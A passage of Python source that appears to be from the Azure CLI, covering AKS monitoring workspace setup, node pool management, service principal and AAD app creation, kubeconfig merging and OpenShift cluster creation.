AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(
rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(
rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
workspace_region, "USGV")
else:
workspace_region = rg_location
workspace_region_code = rg_location.upper()
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id,
default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(
default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
# TODO: track2/replace create_or_update with begin_create_or_update, depends on 'azure.mgmt.resource.resources'
resource_groups.create_or_update(default_workspace_resource_group, {
'location': workspace_region})
GenericResource = cmd.get_models(
'GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
generic_resource = GenericResource(location=workspace_region, properties={
'sku': {'name': 'standalone'}})
async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
generic_resource)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
for key in list(addon.config):
if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
max_surge=None,
mode="User",
enable_encryption_at_host=False,
enable_ultra_ssd=False,
no_wait=False):
AgentPool = cmd.get_models('AgentPool',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
agent_pool,
)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
if kubernetes_version != '' and node_image_only:
raise CLIError(
'Conflicting flags. Upgrading the Kubernetes version will also '
'upgrade node image version. If you only want to upgrade the '
'node version please use the "--node-image-only" option only.'
)
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
max_surge=None,
mode=None,
no_wait=False):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal, aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cmd,
cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[
app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
NetworkProfile = cmd.get_models('NetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(
identity_providers=identity_providers)
